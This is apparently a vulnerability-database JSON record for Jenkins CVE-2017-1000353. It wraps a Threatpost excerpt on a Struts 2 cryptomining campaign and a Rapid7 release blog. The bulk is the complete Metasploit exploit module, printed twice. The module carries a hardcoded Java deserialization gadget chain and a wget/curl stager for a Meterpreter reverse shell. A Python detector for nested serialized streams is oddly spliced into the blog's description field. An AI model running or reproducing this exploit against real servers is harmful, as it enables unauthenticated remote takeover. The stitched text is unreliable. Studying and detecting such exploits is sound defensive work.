malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. 
Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed to have been registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>), [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a PowerShell command on a targeted victim,\u201d researchers said. 
\u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "modified": "2018-09-05T17:48:03", "published": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-09-22T18:47:02", "description": "", "published": "2020-09-22T00:00:00", "type": "packetstorm", "title": "Jenkins 2.56 CLI Deserialization / Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000353"], "modified": "2020-09-22T00:00:00", "id": "PACKETSTORM:159266", "href": "https://packetstormsecurity.com/files/159266/Jenkins-2.56-CLI-Deserialization-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \nprepend Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Jenkins CLI Deserialization', \n'Description' => %q{ \nAn unauthenticated Java object deserialization vulnerability exists \nin the CLI component for Jenkins versions `v2.56` and below. \n \nThe `readFrom` method within the `Command` class in the Jenkins \nCLI remoting component deserializes objects received from clients without \nfirst checking / sanitizing the data. Because of this, a malicious serialized \nobject contained within a serialized `SignedObject` can be sent to the Jenkins \nendpoint to achieve code execution on the target. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'SSD', # PoC \n'Unknown', # Vulnerability discovery \n'Shelby Pace' # Metasploit module \n], \n'References' => \n[ \n[ 'URL', 'https://www.jenkins.io/security/advisory/2017-04-26/'], \n[ 'URL', 'https://ssd-disclosure.com/ssd-advisory-cloudbees-jenkins-unauthenticated-code-execution/'], \n[ 'CVE', '2017-1000353'] \n], \n'Privileged' => false, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Targets' => \n[ \n[ \n'Linux', \n{ \n'Platform' => 'linux', \n'CmdStagerFlavor' => [ 'wget', 'curl' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' } \n} \n] \n], \n'DisclosureDate' => '2017-04-26', \n'Notes' => \n{ \n'Stability' => [ CRASH_SAFE ], \n'Reliability' => [ UNRELIABLE_SESSION ], \n'SideEffects' => [ IOC_IN_LOGS ] \n}, \n'DefaultTarget' => 0 \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The base path to Jenkins', '/' ]) \n] \n) \nend \n \ndef check \nlogin_uri = normalize_uri(target_uri.path, 'login') \nlogin_res = send_request_cgi( \n'method' => 'GET', \n'uri' => login_uri \n) \n \nreturn Exploit::CheckCode::Unknown('Did not receive a response from the server') unless login_res \n \n/Jenkins\\s+ver\\.\\s+(?<version>\\d+(?:\\.\\d+)*)/ =~ login_res.body \nreturn Exploit::CheckCode::Safe('Version of Jenkins cannot be found.') unless version \n \nvers_no = Gem::Version.new(version) \nreturn Exploit::CheckCode::Appears(\"Jenkins version #{version} detected\") if vers_no < Gem::Version.new('2.54') \n \nExploit::CheckCode::Detected \nend \n \ndef exploit \nprint_status('Sending payload...') \nexecute_cmdstager(noconcat: true) \nend \n \ndef format_payload(payload_data) \nformatted_payload = '74' \nformatted_payload << payload_data.length.to_s(16).rjust(4, '0') \nformatted_payload << payload_data.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join \nend \n \ndef execute_command(cmd, _opts = {}) 
\nsess_uuid = SecureRandom.uuid \nsess_uri = normalize_uri(target_uri.path, 'cli') \npreamble = '<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=' \n \nsend_request_cgi( \n{ \n'uri' => sess_uri, \n'method' => 'POST', \n'headers' => \n{ \n'Side' => 'download', \n'Session' => sess_uuid \n} \n}, \nnil, false \n) # don't wait for response, and don't disconnect \n \ncmd = build_obj(cmd) \nsend_request_cgi( \n{ \n'uri' => sess_uri, \n'method' => 'POST', \n'data' => preamble + [ cmd ].pack('H*'), \n'headers' => \n{ \n'Side' => 'upload', \n'Session' => sess_uuid \n} \n} \n) \nsleep(2) # give buffer time between requests for processing \nend \n \ndef build_obj(obj_data) \npayload_data = '00000000aced00057372002f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5265666572656e63654d61' \npayload_data << '701594ca03984908d7030000787077110000000000000001003f40000000000010737200286a6176612e7574696c2e636f6e63757272656e742' \npayload_data << 'e436f70794f6e577269746541727261795365744bbdd092901569d70200014c0002616c74002b4c6a6176612f7574696c2f636f6e6375727265' \npayload_data << '6e742f436f70794f6e577269746541727261794c6973743b7870737200296a6176612e7574696c2e636f6e63757272656e742e436f70794f6e5' \npayload_data << '77269746541727261794c697374785d9fd546ab90c303000078707704000000027372002a6a6176612e7574696c2e636f6e63757272656e742e' \npayload_data << '436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e637572726' \npayload_data << '56e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63' \npayload_data << '757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6' \npayload_data << 'd70617261746f723b7870707372001a6a6176612e73656375726974792e5369676e65644f626a65637409ffbd682a3cd5ff0200035b0007636f' \npayload_data << 
'6e74656e747400025b425b00097369676e617475726571007e000e4c000c746865616c676f726974686d7400124c6a6176612f6c616e672f537' \npayload_data << '472696e673b7870757200025b42acf317f8060854e002000078700000050daced0005737200116a6176612e7574696c2e48617368536574ba44' \npayload_data << '859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6' \npayload_data << 'e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a' \npayload_data << '6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e7' \npayload_data << '32e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61706163' \npayload_data << '68652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6' \npayload_data << 'e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d6954' \npayload_data << '72616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d657' \npayload_data << '23b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d8' \npayload_data << '3418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436' \npayload_data << 'f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c' \npayload_data << '616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e7' \npayload_data << '32e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f' \npayload_data << 
'6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d547' \npayload_data << '97065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c' \npayload_data << '02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a9902000078700' \npayload_data << '00000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078' \npayload_data << '707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106' \npayload_data << 'a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013' \npayload_data << '75720013' \npayload_data << '5b4c6a6176612e6c616e672e537472696e673b' \npayload_data << 'add256e7e91d7b47' \npayload_data << '020000' \npayload_data << '7870' \npayload_data << '00000001' \n \nobj_data = format_payload(obj_data) \npayload_data << obj_data \n \npayload_data << '740004' \npayload_data << '65786563' # exec \npayload_data << '7571007e0' \npayload_data << '01b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c756578' \npayload_data << '7200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700' \npayload_data << '507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878' \npayload_data << '787571007e00110000002f302d02147ed1e347cfebac075517d658628ac128211d8895021500945aaa3b69fb24194cdf22bcee9fc9c5e317266' \n \n# This index is the length of the serialized \n# object that belongs to the SignedObject \nstart_arr = payload_data.index('050daced') \nend_arr = payload_data.index('787571007e') \nnew_arr_len = ((end_arr + 2) / 2) - ((start_arr + 4) / 2) \npayload_data[start_arr, 4] = new_arr_len.to_s(16).rjust(4, '0') \n 
\npayload_data << '0740003445341737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017078737200316f72' \npayload_data << '672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced5302000' \npayload_data << '14c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c' \npayload_data << '656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b03000078707' \npayload_data << '37200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c' \npayload_data << '656d656e747371007e0018787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136' \npayload_data << 'a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a65787000000001770400000001740004617364667878' \npayload_data << '7371007e001e00000000770400000000787871007e00207371007e00027371007e000577040000000271007e001a71007e00097871007e00207078' \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/159266/jenkins_cli_deserialization.rb.txt"}], "metasploit": [{"lastseen": "2020-10-14T08:30:04", "description": "An unauthenticated Java object deserialization vulnerability exists in the CLI component for Jenkins versions `v2.56` and below. The `readFrom` method within the `Command` class in the Jenkins CLI remoting component deserializes objects received from clients without first checking / sanitizing the data. 
Because of this, a malicious serialized object contained within a serialized `SignedObject` can be sent to the Jenkins endpoint to achieve code execution on the target.\n", "published": "2020-09-02T18:37:41", "type": "metasploit", "title": "Jenkins CLI Deserialization", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000353"], "modified": "2020-09-17T18:25:14", "id": "MSF:EXPLOIT/LINUX/HTTP/JENKINS_CLI_DESERIALIZATION", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Jenkins CLI Deserialization',\n 'Description' => %q{\n An unauthenticated Java object deserialization vulnerability exists\n in the CLI component for Jenkins versions `v2.56` and below.\n\n The `readFrom` method within the `Command` class in the Jenkins\n CLI remoting component deserializes objects received from clients without\n first checking / sanitizing the data. 
Because of this, a malicious serialized\n object contained within a serialized `SignedObject` can be sent to the Jenkins\n endpoint to achieve code execution on the target.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'SSD', # PoC\n 'Unknown', # Vulnerability discovery\n 'Shelby Pace' # Metasploit module\n ],\n 'References' =>\n [\n [ 'URL', 'https://www.jenkins.io/security/advisory/2017-04-26/'],\n [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-cloudbees-jenkins-unauthenticated-code-execution/'],\n [ 'CVE', '2017-1000353']\n ],\n 'Privileged' => false,\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Targets' =>\n [\n [\n 'Linux',\n {\n 'Platform' => 'linux',\n 'CmdStagerFlavor' => [ 'wget', 'curl' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }\n }\n ]\n ],\n 'DisclosureDate' => '2017-04-26',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE ],\n 'Reliability' => [ UNRELIABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS ]\n },\n 'DefaultTarget' => 0\n )\n )\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'The base path to Jenkins', '/' ])\n ]\n )\n end\n\n def check\n login_uri = normalize_uri(target_uri.path, 'login')\n login_res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => login_uri\n )\n\n return Exploit::CheckCode::Unknown('Did not receive a response from the server') unless login_res\n\n /Jenkins\\s+ver\\.\\s+(?<version>\\d+(?:\\.\\d+)*)/ =~ login_res.body\n return Exploit::CheckCode::Safe('Version of Jenkins cannot be found.') unless version\n\n vers_no = Gem::Version.new(version)\n return Exploit::CheckCode::Appears(\"Jenkins version #{version} detected\") if vers_no < Gem::Version.new('2.54')\n\n Exploit::CheckCode::Detected\n end\n\n def exploit\n print_status('Sending payload...')\n execute_cmdstager(noconcat: true)\n end\n\n def format_payload(payload_data)\n formatted_payload = '74'\n formatted_payload << 
payload_data.length.to_s(16).rjust(4, '0')\n formatted_payload << payload_data.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join\n end\n\n def execute_command(cmd, _opts = {})\n sess_uuid = SecureRandom.uuid\n sess_uri = normalize_uri(target_uri.path, 'cli')\n preamble = '<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='\n\n send_request_cgi(\n {\n 'uri' => sess_uri,\n 'method' => 'POST',\n 'headers' =>\n {\n 'Side' => 'download',\n 'Session' => sess_uuid\n }\n },\n nil, false\n ) # don't wait for response, and don't disconnect\n\n cmd = build_obj(cmd)\n send_request_cgi(\n {\n 'uri' => sess_uri,\n 'method' => 'POST',\n 'data' => preamble + [ cmd ].pack('H*'),\n 'headers' =>\n {\n 'Side' => 'upload',\n 'Session' => sess_uuid\n }\n }\n )\n sleep(2) # give buffer time between requests for processing\n end\n\n def build_obj(obj_data)\n payload_data = '00000000aced00057372002f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5265666572656e63654d61'\n payload_data << '701594ca03984908d7030000787077110000000000000001003f40000000000010737200286a6176612e7574696c2e636f6e63757272656e742'\n payload_data << 'e436f70794f6e577269746541727261795365744bbdd092901569d70200014c0002616c74002b4c6a6176612f7574696c2f636f6e6375727265'\n payload_data << '6e742f436f70794f6e577269746541727261794c6973743b7870737200296a6176612e7574696c2e636f6e63757272656e742e436f70794f6e5'\n payload_data << '77269746541727261794c697374785d9fd546ab90c303000078707704000000027372002a6a6176612e7574696c2e636f6e63757272656e742e'\n payload_data << '436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e637572726'\n payload_data << '56e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63'\n payload_data << 
'757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6'\n payload_data << 'd70617261746f723b7870707372001a6a6176612e73656375726974792e5369676e65644f626a65637409ffbd682a3cd5ff0200035b0007636f'\n payload_data << '6e74656e747400025b425b00097369676e617475726571007e000e4c000c746865616c676f726974686d7400124c6a6176612f6c616e672f537'\n payload_data << '472696e673b7870757200025b42acf317f8060854e002000078700000050daced0005737200116a6176612e7574696c2e48617368536574ba44'\n payload_data << '859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6'\n payload_data << 'e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a'\n payload_data << '6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e7'\n payload_data << '32e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61706163'\n payload_data << '68652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6'\n payload_data << 'e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d6954'\n payload_data << '72616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d657'\n payload_data << '23b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d8'\n payload_data << '3418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436'\n payload_data << 'f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c'\n payload_data << 
'616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e7'\n payload_data << '32e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f'\n payload_data << '6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d547'\n payload_data << '97065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c'\n payload_data << '02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a9902000078700'\n payload_data << '00000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078'\n payload_data << '707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106'\n payload_data << 'a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013'\n payload_data << '75720013'\n payload_data << '5b4c6a6176612e6c616e672e537472696e673b'\n payload_data << 'add256e7e91d7b47'\n payload_data << '020000'\n payload_data << '7870'\n payload_data << '00000001'\n\n obj_data = format_payload(obj_data)\n payload_data << obj_data\n\n payload_data << '740004'\n payload_data << '65786563' # exec\n payload_data << '7571007e0'\n payload_data << '01b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c756578'\n payload_data << '7200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700'\n payload_data << '507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878'\n payload_data << '787571007e00110000002f302d02147ed1e347cfebac075517d658628ac128211d8895021500945aaa3b69fb24194cdf22bcee9fc9c5e317266'\n\n # This index is the length of the serialized\n 
# object that belongs to the SignedObject\n start_arr = payload_data.index('050daced')\n end_arr = payload_data.index('787571007e')\n new_arr_len = ((end_arr + 2) / 2) - ((start_arr + 4) / 2)\n payload_data[start_arr, 4] = new_arr_len.to_s(16).rjust(4, '0')\n\n payload_data << '0740003445341737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017078737200316f72'\n payload_data << '672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced5302000'\n payload_data << '14c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c'\n payload_data << '656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b03000078707'\n payload_data << '37200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c'\n payload_data << '656d656e747371007e0018787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136'\n payload_data << 'a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a65787000000001770400000001740004617364667878'\n payload_data << '7371007e001e00000000770400000000787871007e00207371007e00027371007e000577040000000271007e001a71007e00097871007e00207078'\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/jenkins_cli_deserialization.rb"}], "rapid7blog": [{"lastseen": "2020-09-29T20:39:12", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000353", "CVE-2018-18556", "CVE-2020-1048", "CVE-2020-12109", "CVE-2020-1472", "CVE-2020-17506"], "description": "\n\nNine! Nine new modules! (Ah ha ha!)\n\nWith the coming of autumn here in the Northern hemisphere, the nights are getting longer, and the hacking is getting stronger. 
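The module description above explains the wrapper (a gadget stream hidden inside the `content` byte[] of a serialized `java.security.SignedObject`), and the length fix-up in `build_obj` rewrites the `[B` element count so that it spans from the inner `aced0005` magic through the `78` byte that closes the inner object. The scanner below is an added example, not code from the Metasploit module, Jenkins or Rapid7: it walks a raw Java serialization stream, reports every byte[] whose contents begin with a second stream header, checks whether the declared element count matches the bytes actually present, and notes whether a SignedObject class descriptor precedes the array. The serialVersionUID constants are the ones visible in the hex on this page; the sample streams are constructed inline, the SignedObject descriptor is simplified to a single field, and the inner stream is only a string, so nothing here is a working exploit.

```python
"""Find Java serialization streams nested inside byte[] members.

Added example; not code from the Metasploit module, Jenkins or any library.
It mirrors the wire layout the module hardcodes: a java.security.SignedObject
whose `content` byte[] carries a second, complete stream, plus the element
count that build_obj patches after splicing in the command string.
"""
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"                    # STREAM_MAGIC, version 5
BYTE_ARRAY_SUID = bytes.fromhex("acf317f8060854e0")   # serialVersionUID of [B
SIGNED_OBJECT = b"java.security.SignedObject"

# TC_ARRAY (0x75) followed by either an inline "[B" class descriptor
# (TC_CLASSDESC, name, SUID, SC_SERIALIZABLE, 0 fields, TC_ENDBLOCKDATA,
# TC_NULL superclass) or a back-reference to one (TC_REFERENCE 0x71 plus a
# 0x007eXXXX handle), then the big-endian int element count.
_BYTE_ARRAY = re.compile(
    rb"\x75(?:\x72\x00\x02\[B" + re.escape(BYTE_ARRAY_SUID)
    + rb"\x02\x00\x00\x78\x70|\x71\x00\x7e..)(.{4})",
    re.DOTALL,
)


def wrap_in_byte_array(inner: bytes) -> bytes:
    """Encode `inner` as the first byte[] of a stream (inline descriptor)."""
    return (
        b"\x75\x72\x00\x02[B" + BYTE_ARRAY_SUID + b"\x02\x00\x00\x78\x70"
        + struct.pack(">I", len(inner)) + inner
    )


def find_nested_streams(blob: bytes) -> list:
    """One record per byte[] whose contents begin with a stream header.

    Heuristic: TC_REFERENCE handles are not resolved, so a back-reference to
    something other than "[B" that happens to be followed by a plausible
    count and the magic bytes would also be reported. Fine for triage.
    """
    hits = []
    for m in _BYTE_ARRAY.finditer(blob):
        (declared,) = struct.unpack(">I", m.group(1))
        start = m.end()
        content = blob[start:start + declared]
        if not content.startswith(STREAM_MAGIC):
            continue                      # ordinary byte[] data, not a stream
        hits.append({
            "array_offset": m.start(),
            "content_offset": start,
            "declared_len": declared,
            "available_len": len(content),
            # build_obj's length fix-up exists so that these two agree
            "length_ok": len(content) == declared,
            # a SignedObject descriptor earlier in the stream is the
            # tell-tale of the CVE-2017-1000353 wrapper
            "inside_signed_object": SIGNED_OBJECT in blob[:m.start()],
        })
    return hits


# Constructed samples (not captured traffic). INNER stands in for the gadget
# stream; here it is only a TC_STRING "abc".
INNER = STREAM_MAGIC + b"\x74\x00\x03abc"
OUTER = (
    STREAM_MAGIC
    + b"\x73\x72\x00\x1a" + SIGNED_OBJECT         # TC_OBJECT, TC_CLASSDESC
    + bytes.fromhex("09ffbd682a3cd5ff")           # SignedObject SUID (page hex)
    + b"\x02\x00\x01"                             # SC_SERIALIZABLE, 1 field shown
    + b"\x5b\x00\x07content\x74\x00\x02[B"        # field `content` of type [B
    + b"\x78\x70"                                 # end descriptor, no superclass
    + wrap_in_byte_array(INNER)
)
BENIGN = STREAM_MAGIC + wrap_in_byte_array(b"hello")   # byte[] of plain data

if __name__ == "__main__":
    for name, blob in (("outer", OUTER), ("benign", BENIGN), ("cut", OUTER[:-2])):
        print(name, find_nested_streams(blob))
```

Run it over the body of the `Side: upload` request once the `<===[JENKINS REMOTING CAPACITY]===>` text and the base64 capability blob have been stripped; a hit with `inside_signed_object` set is the wrapper shape, and `length_ok` false is what the stream looks like before the count has been patched, which is exactly the mismatch `build_obj` corrects. Resolving TC_REFERENCE handles properly needs a full stream parser, which this scanner deliberately does not attempt.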
We\u2019ve really got something for everybody in this release, from IoT to infrastructure, Windows, and Linux; everyone\u2019s pretty well-represented!\n\nWindows has been patching several vulnerabilities lately, and we have modules for them! Metasploit\u2019s own [Spencer](<https://github.com/ZeroSteiner>) and [Brendan](<https://github.com/bwatters-r7>) have been working on bringing in work from others; Spencer wrote a Zerologon ([CVE-2020-1472](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472-aka-zerologon?#rapid7-analysis>)) module based on the work by Tom Tervoort, and Brendan wrote a module covering the PrintDemon vulnerability ([CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=wrap-up>)) building on the work of Alex Ionescu and [shubham0d](<https://github.com/shubham0d>).\n\nSpencer also added a new SOCKS module to unite the tribes of proxies currently in Metasploit, with one module to rule them all, and in the darkness, bind them!\n\nNot to be outdone, our own [Shelby](<https://github.com/space-r7>) added to the module count with [CVE-2017-1000353](<https://attackerkb.com/topics/V3oreaqint/cve-2017-1000353?referrer=wrap-up>), YAJDV (Yet Another Java Deserialization Vulnerability), against everyone\u2019s favorite devops tool, Jenkins. Now you can ask Jenkins to test your code _or_ run it! While this vulnerability may be a bit older, we all know people miss patches, so it is worth checking out.\n\nRounding out the Metasploit team\u2019s contributions are [Grant](<https://github.com/gwillcox-r7>) and a new module to gather information on installed software on targets, and when we say targets, we mean it: Windows, Linux, Android, and Mac are all covered by this new gather module!\n\nAs if the Metasploit team\u2019s contributions were not enough, we had some seriously high-quality work come in from our community members as well! 
